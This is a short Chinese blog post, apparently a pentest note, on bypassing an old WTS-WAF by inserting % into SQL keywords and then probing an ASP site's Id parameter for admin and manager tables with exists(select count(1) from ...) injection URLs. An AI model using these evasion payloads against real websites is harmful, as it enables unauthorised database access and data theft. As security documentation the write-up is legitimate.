天天看点

老版本WTS-WAF bypass小记

起因

挖漏洞的时候总是会遇到​

​WAF​

​,绕过记录

漏洞点

​***view.asp?big=75&Id=1​

​​ 漏洞点在​

​Id​

​参数

添加单引号报错

老版本WTS-WAF bypass小记

来一波老套的​

​Id=1 and 1=1 ​

​,出现防火墙

​***view.asp?big=75&Id=1%20and%201=1​

老版本WTS-WAF bypass小记

bypass

老版本​

​WTS-WAF​

​​绕过很简单,在关键字里面加​

​%​

​符号即可

​***view.asp?big=75&Id=1%20an%d%201=1​

老版本WTS-WAF bypass小记

成功绕过

猜表

猜表名,这个地方使用​

​burpsuite​

​​暴力跑就行,也可以手动测一些比较常规的表名,例如​

​admin​

​***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20admin)​

老版本WTS-WAF bypass小记

说明存在​

​admin​

​​表,为了证明语句没错,再测一下​

​manager​

​表

​***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20manager)​

老版本WTS-WAF bypass小记

说明注入语句没错,​

​manager​

​表不存在

点到为止

参考链接

  • ​​https://zhuanlan.zhihu.com/p/27730232​​
  • ​​https://www.jianshu.com/p/b2da19279f1f​​